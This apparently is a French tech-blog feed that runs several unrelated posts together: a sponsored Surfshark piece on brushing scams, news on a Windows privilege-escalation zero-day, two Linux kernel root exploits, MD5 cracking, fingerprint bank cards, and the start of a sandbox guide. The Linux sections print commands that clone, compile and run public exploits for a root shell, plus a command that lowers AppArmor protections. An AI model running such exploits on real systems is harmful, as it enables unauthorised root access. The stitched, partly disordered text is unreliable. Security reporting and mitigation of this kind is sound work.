C'est peut-être arrivé à une de vos connaissances récemment (ou même à vous). Un petit colis anonyme, sans expéditeur clair, avec dedans une coque de téléphone bas de gamme ou un ustensile de cuisine bidon. Elle a haussé les épaules, jeté l'objet, oublié l'incident. Ou elle avait besoin de l'objet en question et s'est dit "wow quelle chance, enfin une erreur de livraison en ma faveur pour une fois".

Sauf que ces livraisons fantômes cachent souvent une arnaque bien huilée comme une frite belge : le brushing. Et si vous êtes concerné, il y a des gestes simples pour limiter les dégâts. Je vous explique le bazar, les risques, et comment un outil comme Alternative ID, proposé par Surfshark, peut vous aider à reprendre la main.

Le brushing, c'est quoi ce piège à la con ?

Le brushing, c'est une fraude qui joue sur un détail simple. Pour laisser un avis vérifié sur une marketplace (Amazon & co), il faut avoir "acheté" le produit. Les vendeurs peu scrupuleux contournent cette règle en créant de faux comptes avec de vraies adresses, récupérées via des fuites de données, des datas brokers  ou des listes achetées sur le dark web.

Ils expédient ensuite un objet sans valeur à cette adresse. Une fois la livraison confirmée par le transporteur, le faux compte laisse un avis cinq étoiles et un commentaire élogieux sur leur produit qui tue. Résultat : le produit remonte dans les classements, attire de vrais acheteurs et le vendeur empile les ventes légitimes sur une réputation fabriquée.

Vous, dans l'histoire, vous n'avez rien demandé. Mais votre nom et votre adresse viennent d'être validés comme "actifs" dans la base de données du fraudeur. C'est ce signal qui pose problème.

Pourquoi c'est plus grave qu'un simple spam

Recevoir un colis inattendu peut sembler anodin. Pourtant, plusieurs risques méritent toute votre attention. D'abord, la confirmation de vos coordonnées. Une adresse validée par brushing devient une cible prioritaire pour d'autres campagnes que ce soit du phishing ciblé, des tentatives de prise de contrôle de compte ou même une usurpation d'identité partielle. Et tout ça juste parce que vous avez validé la réception du colis, donc même avant d'avoir ouvert celui-ci. Et vous ne pouvez pas y faire grand-chose car même si vous n'êtes pas chez vous, le livreur peut éventuellement le déposer chez un voisin ou un gardien d'immeuble qui validera la réception sans savoir ce qu'il se passe !

Ensuite, le risque de confusion comptable. Certains fraudeurs utilisent vos informations pour ouvrir des comptes sur des plateformes de paiement ou de crédit. Si vous ne surveillez pas vos relevés, l'activité peut passer inaperçue pendant des mois.

Enfin, la fatigue psychologique. Multiplier les signalements, les démarches administratives, les changements de mot de passe ça use. Et c'est souvent ce sur quoi comptent les escrocs, que vous abandonniez par lassitude.

Alternative ID : une parade simple et efficace

C'est là qu'intervient Alternative ID , une fonctionnalité de Surfshark souvent sous-estimée et qui est maintenant intégrée dès le starter pack (l'abonnement le moins cher).

Le concept est direct puisqu'au lieu de donner vos vraies informations pour chaque inscription en ligne, vous générez un profil secondaire. Nom, prénom, email, même numéro de téléphone temporaire. Tout est factice, mais fonctionnel pour valider une création de compte.

Appliqué au brushing, l'intérêt est immédiat. Si vous utilisez une identité Alternative ID pour vous inscrire sur une marketplace ou un site e-commerce peu connu, ou pour profiter d'une offre promotionnelle douteuse, et que ces données sont piratées ou sont revendues, ce n'est pas votre véritable identité qui se retrouve entre de mauvaises mains.

L'astuce consiste à segmenter. Une identité principale pour les services critiques (banque, administration, email personnel) et des identités secondaires pour tout le reste. En cas de fuite (et là aussi Surfshark intervient avec son système Alert qui surveille le dark web pour vous), vous supprimez l'alias concerné sans impacter vos comptes essentiels.

Ce que fait Surfshark en dehors d'Alternative ID

Alternative ID ne fonctionne pas isolément. Plusieurs fonctionnalités de Surfshark renforcent la protection globale :

• CleanWeb bloque les domaines connus pour héberger des scripts de tracking, des pubs malveillantes ou des pages de phishing. En réduisant les requêtes vers des serveurs tiers, il limite les opportunités de collecte de données à votre insu.

• La politique no-logs, auditée par Deloitte, et les serveurs RAM-only sont conçus pour ne conserver aucune trace de votre activité. Surfshark se conforme aux décisions de justice qui s'imposent légalement, mais comme aucune donnée d'activité n'est stockée, il n'y a concrètement rien à transmettre. C'est une protection structurelle.

• L'IP Rotator change régulièrement votre adresse IP de sortie pendant une session. Cela complique la corrélation de vos activités par les régies publicitaires ou les trackers comportementaux.

• Le Kill Switch, en mode strict, coupe toute connexion internet si le tunnel VPN tombe. Cela prévient les fuites accidentelles d'IP qui pourraient exposer votre localisation réelle.

Enfin, l'abonnement couvre un nombre illimité d'appareils . Vous pouvez protéger votre ordinateur, votre téléphone, ceux de votre conjoint et de vos enfants, sans surcoût. La sécurité devient alors une pratique collective, pas individuelle.

Quelques gestes concrets pour limiter les risques

Au-delà des outils, l'hygiène numérique reste la première ligne de défense. Si vous recevez un colis non commandé, ne cliquez sur aucun lien inclus dans l'emballage, ne scannez pas de QR code suspect, et ne contactez pas le numéro de "service client" indiqué. Signalez l'incident à la plateforme concernée si l'expéditeur est identifiable, et conservez une trace pour d'éventuelles démarches ultérieures. Et bien entendu n'utilisez pas l'objet en lui-même, ce sont souvent des bouses complètes qui peuvent vous exploser dans les mains ou sont réalisées en matériaux bas de gamme qui empoisonneront vos intérieurs lol.

Surveillez régulièrement vos relevés bancaires et vos comptes en ligne. Une activité inexpliquée, même mineure, peut être un signal d'alerte. Évitez aussi de réutiliser les mêmes informations personnelles sur de multiples sites. Plus vos données circulent, plus la surface d'attaque s'élargit. Enfin, activez la double authentification partout où c'est possible. Même si un fraudeur obtient votre mot de passe, cette couche supplémentaire bloque souvent l'intrusion.

Mon ressenti sur l'ensemble

Je vous l'ai déjà dit mais ce qui me plaît dans l'approche de Surfshark, c'est la cohérence entre les différentes fonctionnalités et son côté proactif. Alternative ID n'est pas un gadget ajouté pour faire joli, il s'intègre dans une logique plus large de maîtrise des données personnelles. CleanWeb, no-logs, IP Rotator, Kill Switch, le mode camouflage : chaque brique répond à un vecteur d'attaque spécifique. Ensemble, elles forment un dispositif qui ne promet pas l'invisibilité totale, mais qui rend la tâche des fraudeurs nettement plus coûteuse.

Est-ce que cela suffit à éradiquer le brushing ? Non. Aucune solution technique ne remplace la vigilance humaine. Mais cela réduit significativement les risques, et surtout, cela redonne du contrôle à l'utilisateur. Le brushing n'est pas une arnaque spectaculaire. Pas de rançon, pas de menace directe, pas de compte vidé en quelques clics. C'est une fraude sournoise, qui progresse par accumulation de petits signaux. C'est précisément ce genre de menace qui justifie une approche défensive en profondeur. Pas de solution miracle, mais des couches de protection qui, combinées, découragent l'adversaire moyen.

Et si un jour vous recevez un colis mystère, vous saurez désormais que ce n'est pas un cadeau du ciel. Juste un signal à prendre au sérieux.

L'offre du moment

Pour ceux qui souhaitent franchir le pas, Surfshark propose actuellement un tarif de 2,4€ mensuel (TTC) sur 24 mois, avec trois mois gratuits et une période d'essai de 30 jours.

L'abonnement inclut la protection d'un nombre illimité d'appareils, ce qui facilite le déploiement sur l'ensemble de votre parc personnel ou professionnel. Yapuka !

Surfshark au meilleur prix !

Précision utile : ce lien contient un identifiant affilié. Vous ne payez rien de plus, mais une commission me permet de continuer à produire des articles indépendants, sans dépendre de la publicité programmatique ou des contenus sponsorisés opaques.

Un nouveau zero-day Windows baptisé « MiniPlasma » vient d’être publié publiquement avec un exploit Proof of Concept (PoC). La vulnérabilité permettrait à un utilisateur disposant déjà d’un accès local limité d’obtenir les privilèges SYSTEM, soit le niveau d’accès le plus élevé sous Windows.

Cette nouvelle faille a été révélée par le chercheur « Chaotic Eclipse », déjà à l’origine des récents PoC BlueHammer, RedSun, UnDefend et YellowKey visant différentes protections de Windows et BitLocker.

MiniPlasma exploite le Planificateur de tâches Windows

Selon les premières analyses, MiniPlasma cible le service Windows Task Scheduler (Planificateur de tâches).

Le PoC exploiterait une mauvaise gestion des liens symboliques et des permissions de certains fichiers utilisés pendant l’exécution de tâches système. L’attaquant pourrait alors détourner ce mécanisme pour exécuter du code avec les privilèges SYSTEM.

Concrètement, un utilisateur standard pourrait :

• créer certains liens symboliques
• manipuler des chemins de fichiers spécifiques
• déclencher une tâche système
• obtenir une élévation de privilèges complète

Le PoC publié permettrait d’obtenir un shell SYSTEM en quelques secondes sur certaines versions de Windows.

Une faille locale mais très dangereuse

MiniPlasma ne permet pas une compromission à distance directe via Internet. L’attaquant doit déjà disposer :

• d’un accès local
• ou d’un malware exécuté avec des droits utilisateur classiques

Mais ce type de faille reste extrêmement critique dans les chaînes d’attaque modernes.

En pratique, les cybercriminels utilisent souvent ce genre d’élévation de privilèges après :

• un phishing
• une exécution de malware
• une faille navigateur
• une compromission RDP
• une infection initiale limitée

L’objectif est ensuite d’obtenir les privilèges SYSTEM afin de :

• désactiver Microsoft Defender
• contourner certaines protections
• installer des rootkits
• accéder à davantage de données
• persister dans le système

Une ancienne faille Google Project Zero toujours exploitable ?

Selon le chercheur Chaotic Eclipse, MiniPlasma ne serait pas une vulnérabilité entièrement nouvelle. Le problème toucherait en réalité le pilote système cldflt.sys, utilisé par Windows pour les fonctionnalités Cloud Filter liées notamment à OneDrive et aux fichiers à la demande.

La faille se situerait plus précisément dans la routine HsmOsBlockPlaceholderAccess.

Le plus surprenant est que cette vulnérabilité avait déjà été signalée à Microsoft en septembre 2020 par le chercheur James Forshaw de Google Project Zero. À l’époque, elle avait reçu l’identifiant CVE-2020-17103 et Microsoft avait annoncé un correctif déployé en décembre 2020.

Mais selon Chaotic Eclipse, le problème serait toujours exploitable aujourd’hui.

Le chercheur affirme que :

• soit le correctif initial n’a jamais complètement résolu le problème
• soit une modification ultérieure de Windows aurait réintroduit silencieusement la faille

Encore plus inquiétant, il explique que le PoC original publié par Google fonctionnerait toujours sans modification majeure.

BleepingComputer a d’ailleurs testé l’exploit sur un système Windows 11 Pro entièrement à jour avec les mises à jour Patch Tuesday de mai 2026.

Dans leur test :

• un simple compte utilisateur standard a été utilisé
• l’exploit a été exécuté localement
• une invite de commande avec les privilèges SYSTEM a été obtenue immédiatement

Cela montre que la vulnérabilité reste exploitable même sur des systèmes Windows 11 récents et entièrement patchés.

Un nouveau PoC publié avant correctif Microsoft

Comme pour les précédentes vulnérabilités publiées par Chaotic Eclipse, Microsoft n’aurait pas encore publié de correctif officiel au moment de la publication du PoC.

Le chercheur accuse une nouvelle fois Microsoft d’avoir ignoré ou retardé le traitement de certains rapports de sécurité.

Ces derniers mois, plusieurs PoC similaires ont été publiés publiquement avant correction :

• BlueHammer
• RedSun
• UnDefend
• YellowKey
• GreenPlasma

Certaines de ces vulnérabilités ont finalement été corrigées discrètement dans les Patch Tuesday suivants après médiatisation.

Pour aller plus loins sur le sujet :

• Windows : des failles zero-day Microsoft Defender exposées, déjà exploitées dans des attaques
• Une faille BitLocker permettrait d’accéder à des disques chiffrés Windows : un PoC publié

Les protections Windows modernes ne suffisent pas toujours

Même avec :

• Secure Boot
• TPM
• VBS
• HVCI
• Microsoft Defender

Windows reste vulnérable aux élévations de privilèges locales lorsque certains composants historiques du système sont mal protégés.

Le problème est que Windows conserve encore énormément de mécanismes hérités pour :

• la compatibilité logicielle
• les services système
• les tâches planifiées
• les composants Win32 historiques

Le Planificateur de tâches Windows est notamment une cible régulière des chercheurs sécurité car il fonctionne avec des privilèges très élevés et interagit avec de nombreux composants système sensibles.

Microsoft pourrait corriger discrètement la faille

Pour le moment, Microsoft n’a pas communiqué officiellement sur MiniPlasma.

Mais au vu des précédents cas récents, il est probable que :

• un correctif soit préparé
• une CVE soit attribuée plus tard
• la correction arrive dans un futur Patch Tuesday

Les administrateurs système et utilisateurs sensibles doivent donc :

• surveiller les prochaines mises à jour Windows
• éviter l’exécution de programmes non fiables
• limiter les comptes administrateurs locaux
• maintenir Microsoft Defender actif

Sources :

• BleepingComputer – MiniPlasma zero-day
• The Register – Nouveau PoC Windows privilege escalation
• BleepingComputer – YellowKey BitLocker exploit
• Microsoft – Windows Task Scheduler documentation

L’article MiniPlasma : un nouveau zero-day Windows donne les privilèges SYSTEM, un PoC publié est apparu en premier sur malekal.com.

Bon, accrochez vous les amis, car ça enchaine sec sur le kernel Linux en ce moment... Le chercheur William Bowling de l'équipe V12 security vient de lâcher Fragnesia (CVE-2026-46300, CVSS 7.8), un nouvel exploit kernel Linux qui permet d'obtenir un accès root sur toutes les distros majeures, et ce, 8 jours seulement après le patch de Dirty Frag.

Et la mauvaise nouvelle, en fait, c'est que Fragnesia tape dans la même surface d'attaque que Dirty Frag , mais via un bug logique différent qui n'est pas fixé par le patch initial. Donc si vous aviez sagement mis à jour votre noyau le 8 mai dernier en pensant être tranquille, hé bah désolé, vous êtes toujours à poil !

La lignée "Dirty" continue donc tout simplement de s'allonger... Dirty COW en 2016, Dirty Pipe en 2022, Copy Fail le 1er mai 2026, Dirty Frag le 8 mai, et maintenant Fragnesia le 14 mai. Quatre LPE (local privilege escalation) kernel Linux en deux semaines, c'est un record je crois !

Alors comment ça marche ?

Le bug se planque dans la partie du kernel qui gère le chiffrement réseau IPsec. C'est le truc qu'on utilise pour faire du VPN d'entreprise et l'attaque détourne le moteur de chiffrement pour qu'il écrive là où il ne devrait surtout pas écrire.

Le déroulé ensuite est assez simple à comprendre. Il prend un fichier sensible déjà ouvert en lecture (genre /usr/bin/su, le programme qui fait passer en root), il le balance dans une connexion réseau, et il dit au kernel "tiens, chiffre-moi tout ça en IPsec". Le kernel obéit gentiment, sauf qu'au lieu d'envoyer le résultat chiffré sur le réseau, il vient écraser la version du fichier qui est en mémoire avec les octets chiffrés. Du coup /usr/bin/su contient maintenant du code choisi par l'attaquant. Suffit ensuite de taper su pour devenir root.

Et là c'est le drame !

Le pire, c'est qu'il n'y a aucun "tirage au sort" dans tout ça. Pas besoin de gagner une condition de course une fois sur mille comme à l'époque de Dirty COW. Là, c'est 100% reproductible à chaque exécution, ça marche du premier coup.

La cause profonde, c'est une fonction kernel qui assemble des morceaux de paquets réseau et qui oublie au passage que certains morceaux pointent vers de la mémoire qui ne lui appartient pas vraiment (genre la mémoire d'un fichier qu'un autre process est en train de lire). Bowling appelle ça la "famille Dirty Frag" parce que c'est exactement le même genre d'amnésie qui avait permis Dirty Frag la semaine dernière.

Et le patch du 8 mai n'a pas suffi parce qu'il a juste rebouché un trou particulier, sans toucher à la fonction d'origine. D'où la sortie immédiate du PoC le 14 mai, parce qu'autant prévenir tout le monde, plutôt que de laisser un 0-day silencieux circuler dans les milieux moins recommandables d'Internet.

Testez sur votre Linux

Si vous voulez reproduire ça dans un environnement isolé (genre une VM Ubuntu 24.04 avec un kernel 6.8.0-111-generic), c'est simple :

git clone https://github.com/v12-security/pocs.git
cd pocs/fragnesia
gcc -o exp fragnesia.c && ./exp

sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0

Votre navigateur ne supporte pas la lecture de vidéos HTML5. Voici un
<a href="/fragnesia/fragnesia-1.mp4">lien vers la vidéo</a>.

echo 3 > /proc/sys/vm/drop_caches

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/fragnesia.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

60% des mots de passe hashés en MD5 peuvent être cassés en moins d'une heure... C'est ce que dit en tout cas une étude de Kaspersky publiée cette semaine qui se base sur +231 millions de mots de passe qu'on peut trouver sur le dark web et tirés de fuites ayant eu lieu entre 2023 et 2026. D'après leurs tests, 48% sont craqués en moins d'une minute et 60% en moins d'une heure. C'est pas très rassurant, surtout si votre base tourne encore au MD5.

Ce qui a changé ces dernières années, c'est surtout la puissance des GPU modernes qui n'a cessé d'augmenter. Par exemple, une RTX 5090 monte à 220 milliards de hash MD5 par seconde ce qui représente une augmentation de +34% par rapport à la RTX 4090 ! Du coup, louer un GPU cloud pour lancer une attaque par dictionnaire revient à quelques dizaines de centimes à quelques dollars de l'heure. C'est rentable hein ?

L'étude souligne aussi que 53% des mots de passe du corpus se terminent par des chiffres. Et là, du point de vue des règles hashcat, c'est du pain bénit car les crackers adorent la prévisibilité. Alors attention si vous administrez un service web avec une gestion de comptes utilisateur car les attaques modernes (dictionnaire + règles hashcat) règlent aujourd'hui son compte à une bonne partie du corpus et cela en moins d'une minute. Par contre, les mots de passe longs avec symboles variés résistent encore puisque c'est exponentiel ! Vaut mieux une phrase de passe avec plein de mots et facile à retenir du genre running-douche-afford-laborer-art-amber-deftly-acetone-lego-reoccupy qu'un mot de passe court et complexe comme 3d2^vO$RZ1.

Bref, MD5 pour les mots de passe c'est mort donc si vous avez encore ça dans vos bases, migrez moi tout ce bordel rapidement ! La migration maintenant, ça se fait vers Argon2id en priorité... Je balance pas ça au pif, hein, c'est le standard recommandé par OWASP et le NIST, et c'est memory-hard, donc les GPU ne peuvent pas juste brute-forcer des milliards de hashs par seconde comme avec MD5.

Après si votre stack est ancienne et qu'Argon2id n'est pas dispo, bcrypt reste une option solide. Dans tous les cas, évitez SHA-1, SHA-256 ou SHA-512 sans algorithme adaptatif car ils sont rapides par conception, donc tout aussi crackables que MD5.

Source

Le chercheur en sécu Hyunwoo Kim vient de lâcher dans la nature Dirty Frag, un nouvel exploit kernel Linux qui enchaîne 2 vulnérabilités pour obtenir un accès root sur n'importe quelle distro majeure, avec un taux de réussite proche de 100%.

L'embargo devait tenir encore quelques semaines. Il n'a pas tenu.

Et problème (et c'est pour ça que je vous en parle) c'est que ça marche du feu de dieu, et que personne n'a encore de patch disponible !! Alerte rouge donc !!

La lignée "Dirty" a donc maintenant quatre membres. Dirty COW en 2016, avec ses 9 ans de présence silencieuse dans le kernel avant d'être découvert, Dirty Pipe en 2022, Copy Fail dont je vous parlais il y a tout juste 8 jours, découvert par une IA. Et maintenant Dirty Frag, qui s'appuie sur le même principe que Copy Fail tout en contournant sa mitigation connue.

Alors comment ça marche ?

Le concept du truc c'est l'abus d'un mécanisme tout à fait légitime du kernel Linux : splice(). Cette fonction permet de faire circuler des données entre deux descripteurs de fichiers sans les copier en mémoire. C'est très utile, très performant, mais dans certaines configurations, c'est surtout très catastrophique.

Dirty Frag exploite les modules réseau d'IPsec (ESP) et du protocole RxRPC, ainsi quand un attaquant utilise splice() pour faire passer une page du cache mémoire (disons, /usr/bin/su) dans un buffer réseau, le kernel effectue son chiffrement directement sur cette page en RAM et sans faire de copie.

Résultat, les premiers octets de /usr/bin/su en mémoire sont remplacés par du code malveillant qui ouvre un shell root. Un simple appel à su ensuite, et l'attaquant est root.

Deux CVE sont impliqués dans la chaîne. CVE-2026-43284 qui concerne les modules esp4 et esp6 et qui a été patchée depuis hier et CVE-2026-43500 qui concerne rxrpc et pour celle-ci, y'a aucun patch actuellement à l'heure où j'écris ces lignes.

Le fait de chainer les 2 exploits permet à chacun de combler les angles morts de l'autre. C'est un peu technique mais en gros, la variante ESP requiert les droits de créer un namespace utilisateur, ce qu'Ubuntu peut bloquer via AppArmor. Alors que de son côté, la variante RxRPC ne nécessite pas ce privilège, mais le module rxrpc.ko n'est chargé par défaut que sur... Ubuntu. Du coup, une fois combinés, ils couvrent toutes les distros majeures sans exception.

Hyunwoo Kim a reporté la faille aux mainteneurs des distribs le 30 avril dernier, avec un accord de divulgation coordonnée via [email protected]. Mais un tiers extérieur (appelons le "connard" ^^) a brisé l'embargo hier, d'où la publication immédiate du PoC, avec l'accord des maintainers, pour éviter qu'un exploit silencieux circule sans que personne soit prévenu.

Les versions testées et confirmées vulnérables sont donc Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44.

En gros, si vous avez un kernel compilé depuis début 2017, vous êtes dans le scope.

Tester avec Lima sur macOS

Si vous voulez reproduire ça dans un environnement contrôlé, l'idée c'est de lancer une Ubuntu 24.04 avec le kernel non patché et de faire comme ceci :

# Cloner, compiler, et lancer
git clone https://github.com/V4bel/dirtyfrag.git
cd dirtyfrag
sudo apt install gcc -y && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Et si tout se passe bien, vous obtenez alors un shell root sans faire paniquer le kernel comme chez moi ici :

Après le test, le page cache est contaminé donc avant de faire quoi que ce soit d'autre, faut le nettoyer. :

echo 3 > /proc/sys/vm/drop_caches

Ou plus simple, redémarrez la machine car la modification est uniquement en RAM, donc un reboot permet de repartir de zéro.

Alors que faire ?

Hé bien, comme aucun patch n'est disponible pour la plupart des distros à l'heure où j'écris ces lignes, vous pouvez vous mettre en boule et pleurer. Sauf si vous êtes sous AlmaLinux car eux ont déjà poussé des kernels corrigés. Après vous pouvez aussi sécher vos larmes si vous êtes sur une autre distro, et suivre cette remédiation qui vous prendra trente secondes :

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"

Cette commande fait trois choses : elle blackliste les modules vulnérables pour qu'ils ne se rechargent pas au prochain boot, elle les décharge s'ils sont actifs, et elle nettoie le page cache au cas où il serait déjà corrompu.

Après c'est tranquille à faire car esp4, esp6 et rxrpc ne sont pas des modules que la plupart des machines desktop utilisent au quotidien. Les désactiver n'a donc aucun impact visible sur 99% des setups. Mais un serveur qui fait du VPN IPsec en mode transport ESP, lui, sera affecté...

En tout cas, surveillez ça de près car une fois que votre distro sortira le patch, faudra mettre à jour et rebooter.

Source : https://github.com/V4bel/dirtyfrag

Depuis quelques jours, plusieurs médias français ressortent cette merveilleuse histoire de la carte bancaire à empreinte digitale comme s'il s'agissait d'une révolution imminente ! Par exemple l'Indépendant titre carrément "le code à quatre chiffres c'est bientôt fini". Toudoum !!

Sauf que la techno, conçue par Thales et IDEMIA , est commercialisée en Europe depuis 2021 quand même. Et plus drôle encore, c'est que BNP Paribas a fermé la commercialisation de sa première version le 8 décembre 2025, soit bien avant que la presse en fasse un sujet d'actualité "frais".

La carte F.CODE d'IDEMIA, l'un des deux principaux fabricants de cartes biométriques en Europe avec Thales (crédit : IDEMIA).

Donc bon, on va remettre les pendules à l'heure ensemble, parce que le sujet mérite mieux qu'un communiqué de presse recopié à la chaîne par dix rédactions. Je vous propose donc de remettre un peu tout ça à plat parce que je lis quand même pas mal de conneries.

Tout d'abord, il faut savoir que le principe technique derrière ces CB est solide, faut le reconnaître. Vous posez le pouce sur un petit capteur de quelques millimètres intégré à la carte, le module Secure Element (l'équivalent du coffre-fort embarqué) compare l'empreinte au gabarit stocké dans la puce, et si ça matche, le paiement passe en moins d'une seconde !

Le mot-clé c'est d'ailleurs "match-on-card". Cela veut dire que la comparaison se fait localement, et donc que l'empreinte ne sort jamais de la carte, ni vers le commerçant, ni vers la banque, ni vers un serveur quelque part. C'est donc exactement le même délire que Touch ID ou Face ID chez Apple, et c'est ce qui distingue ce système d'une base biométrique centralisée façon ANT, dont on a vu cette année à quel point ça pouvait mal finir (looool).

Côté sécurité, y'a beaucoup de vrais points positifs. Le code PIN à quatre chiffres, c'est dix mille combinaisons. Avec un peu de skimming sur un terminal compromis et une caméra cachée au-dessus du clavier, vous pouvez tout récupérer encore plus facilement. Sans parler des PIN type 1234, 0000 ou date de naissance qui représentent une part énorme des codes en circulation selon les analyses de DataGenetics (1234 représente à lui seul environ 10,7% des PIN observés sur 3,4 millions de codes analysés).

La biométrie vient donc tuer ce vecteur d'attaque d'un coup. Ainsi, si quelqu'un vole votre carte, il ne peut rien en faire, en théorie, sans votre doigt. Faudra avoir un bon sécateur ^^. Et niveau conformité, ça rentre pile-poil dans le cadre PSD2 et l'authentification forte du client puisque la biométrie remplace le facteur "savoir" (le PIN) par un facteur "inhérence" (votre corps), ce qui valide les deux facteurs requis avec la possession de la carte. Une fois encore c'est comme avec l'iPhone et FaceID / TouchID quand on se connecte quelque part.

Sauf que voilà, c'est là que les médias arrêtent de creuser. Et y'a beaucoup de choses à creuser, croyez-moi ! Perso je trouve ça assez "gênant" (comme disent les zados... "Annnnh la génance !!") qu'on nous présente un sujet sécurité aussi important comme si on nous vendait des yaourts.

Parce que d'abord, le code PIN ne disparaît pas, sauf si vous avez la chance d'avoir une banque qui vous laisse le désactiver explicitement (et bonne chance pour trouver l'option dans les CGV). Hé oui, quasi toutes les implémentations que j'ai pu voir passer, gardent un bon gros fallback PIN pour les cas où le capteur foire (doigt mouillé, sale (sacré lulu), blessure, capteur défaillant) ou pour les retraits au DAB.

Or, vous le savez parce que vous avez Bac+18 en bon sens, la sécurité globale d'un système est celle de son maillon le plus faible. Donc si le code PIN reste en backup, vous n'avez pas supprimé le maillon faible mais vous l'avez juste rendu optionnel. Et donc un voleur qui sait ça, sera capable de forcer le fallback en simulant un échec biométrique et utiliser le code PIN pour peu qu'il le connaisse. Comme avant quoi...

Donc cette promesse "fin du code à 4 chiffres" est donc un bon gros raccourci marketing, et pas du tout une réalité technique.

Ensuite, autre souci, c'est que la biométrie n'est pas révocable. Donc si demain un labo ou un expert sécu arrive à extraire un gabarit d'empreinte d'un Secure Element compromis (ça s'est déjà vu sur des puces certifiées EAL5+ par attaques side-channel), vous ne pourrez pas changer votre doigt parce que j'sais pas si vous avez remarqué mais il est bien solidement attaché au sac de viande que vous appelez "Mon summer body" ^^.

Le risque est heureusement limité dans ce cas-ci parce que le gabarit reste sur la carte, mais structurellement, la donnée biométrique EST un mot de passe que vous ne pouvez jamais changer. C'est une contrepartie importante que personne ne mentionne dans les articles grand public.

Sur les attaques physiques par exemple, le Chaos Computer Club qu'on connaît tous, a démontré dès 2013 le bypass de Touch ID avec un moulage en latex fabriqué à partir d'une empreinte laissée sur un verre. Les capteurs intégrés dans une carte bancaire sont plus petits, moins denses en pixels, et n'ont pas la même puissance de calcul pour faire tourner des modèles anti-spoof avancés que ce qui est embarqué dans un iPhone.

Ils sont donc plausiblement PLUS contournables, donc j'imagine qu'un moulage en silicone ou en résine pourra facilement en venir à bout. À ma connaissance, y'a aucun chiffre public sérieux qui n'a été publié par les fabricants sur le taux de succès de ces attaques sur leurs cartes. Comme c'est pratique ;)

Le sujet de la mise sous pression par des affreux bandits, mérite aussi une mention. Parce qu'avec un code PIN, si on vous menace devant un DAB, vous pouvez théoriquement saisir un faux code (certaines cartes ont même une notion de " code sous contrainte " qui bloque la carte directement). Alors qu'avec un doigt, on vous chope la main et force et voilà...

La jurisprudence américaine est d'ailleurs intéressante là-dessus puisqu'un juge peut vous obliger à poser le doigt sur un TouchID, mais pas à donner votre code PIN par respect du 5e amendement. En France le débat est un peu différent mais analogue. C'est un petit détail légal mais personne ne l'aborde non plus pour tout ce qui est sécurité biométrique en général.

L'enrôlement à domicile via smartphone, vendu comme "sécurisé" mais dont le protocole détaillé reste opaque (crédit : IDEMIA).

Autre angle mort, l'enrôlement. En effet, aucun des articles que j'ai lus ne décrit exactement comment l'empreinte arrive dans la puce la première fois. Est-ce que ça se fait en agence, avec un lecteur dédié ? Via une app smartphone qui pousse le gabarit par NFC ?

On en sait rien, mais si c'est la seconde option, le pipeline app + carte est une surface d'attaque qui mérite un audit indépendant, et la promesse de "l'empreinte ne quitte jamais la carte" devient à géométrie variable. Côté Thales et IDEMIA, le marketing parle d'enrôlement à domicile sécurisé, mais les détails du protocole sont peu documentés, tout du moins ce que j'ai pu trouver en libre accès.

Et pour finir sur le côté pratique, la biométrie est une option payante. Bah ouais, 24 balles par an chez BNP et Crédit Agricole, sur des cartes Visa Premier ou Mastercard Gold qui coûtent déjà entre 130 et 180€ annuels, pourquoi se faire chier ? Société Générale a annoncé vouloir descendre en gamme là-dessus, mais pour l'instant, la sécurité forte est réservée à ceux qui peuvent payer. Sécurité à deux vitesses, donc, comme d'hab et moi je trouve que c'est un peu paradoxal pour un truc présenté comme la nouvelle norme.

Bref, mon verdict sur tout ça c'est que le design technique est bon, le match-on-card protège VRAIMENT des fuites massives, et ça c'est un excellent progrès face au PIN à 4 chiffres pour tout ce qui est usage courant. Mais le narratif "fin du code secret" reste faux puisque le PIN perdure en fallback, et surtout, la biométrie pose des problèmes structurels bien connus (non-révocable, vulnérable aux moulages, coercition, enrôlement opaque).

Donc voilà, si demain votre banque vous propose le passage au biométrique, demandez-lui comment se passe l'enrôlement, si le fallback PIN est désactivable, et combien ça coûte. Et peut-être que là, ça pourra être intéressant.

Exécuter un fichier téléchargé sans vérification est l’une des causes les plus fréquentes d’infection sur Windows. Un programme apparemment légitime peut contenir un malware capable de compromettre votre PC en quelques secondes.

Pour limiter les risques, il ne suffit pas d’analyser un fichier : il est parfois nécessaire de le tester dans un environnement sécurisé.

Plusieurs solutions existent pour cela :

• Windows Sandbox (bac à sable intégré)
• machine virtuelle (VirtualBox)
• sandbox en ligne

Ces méthodes permettent d’exécuter un fichier sans impacter votre système principal.

Dans ce guide, vous allez découvrir comment tester un fichier en toute sécurité sur Windows 11/10, quelles méthodes utiliser et laquelle choisir selon votre besoin.

Pourquoi tester un fichier avant de l’exécuter

Avant d’ouvrir ou d’installer un fichier téléchargé, il est fortement recommandé de le tester. En effet, un simple programme peut contenir un malware capable d’infecter votre PC en quelques secondes.

Même un fichier qui semble légitime peut être dangereux :

• logiciel téléchargé hors site officiel
• archive contenant un exécutable
• crack ou keygen
• pièce jointe reçue par email

Une seule exécution suffit parfois à compromettre votre système.

Un risque souvent sous-estimé

De nombreux malwares sont conçus pour :

• s’installer discrètement
• voler des données personnelles
• modifier le système
• ouvrir une porte d’accès à distance

Et cela peut se produire sans signe visible immédiat.

Tester plutôt qu’analyser

L’analyse (antivirus, VirusTotal) donne une indication, mais elle ne suffit pas toujours.

Tester un fichier permet de :

• observer son comportement réel
• détecter des actions suspectes
• vérifier son impact sur le système

C’est une étape supplémentaire pour réduire les risques.

Une protection essentielle

Tester un fichier avant exécution permet :

• d’éviter une infection
• de protéger vos données
• de préserver la stabilité de votre PC

C’est une pratique simple qui peut éviter des problèmes importants.

Analyser vs tester un fichier : quelles différences

Avant d’exécuter un fichier, deux approches sont possibles : l’analyser ou le tester. Ces méthodes sont complémentaires mais répondent à des objectifs différents.

Analyser un fichier

L’analyse consiste à vérifier un fichier sans l’exécuter.

Elle repose sur des outils comme :

• antivirus
• VirusTotal (multi-antivirus)
